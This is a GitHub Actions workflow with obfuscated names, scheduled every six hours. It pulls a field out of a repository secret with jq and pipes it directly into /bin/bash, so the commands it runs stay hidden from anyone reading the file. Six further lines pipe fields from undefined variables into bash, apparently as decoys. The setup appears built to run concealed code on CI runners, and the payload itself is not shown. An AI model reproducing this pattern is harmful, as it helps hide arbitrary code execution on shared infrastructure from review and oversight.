name: duanqirui2603
on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanqirui2603
        env:
          i1366: ${{ secrets.i1366 }}
        run: |
          echo $i1366 | jq -r .xn15426 | /bin/bash
          echo $rae7059 | jq -r .diaa5 | /bin/bash
          echo $se590 | jq -r .cb4138 | /bin/bash
          echo $mgv99344 | jq -r .jm2671 | /bin/bash
          echo $h4 | jq -r .gsyo1 | /bin/bash
          echo $dxa41832 | jq -r .wml44729 | /bin/bash
          echo $fyc2 | jq -r .op699 | /bin/bash

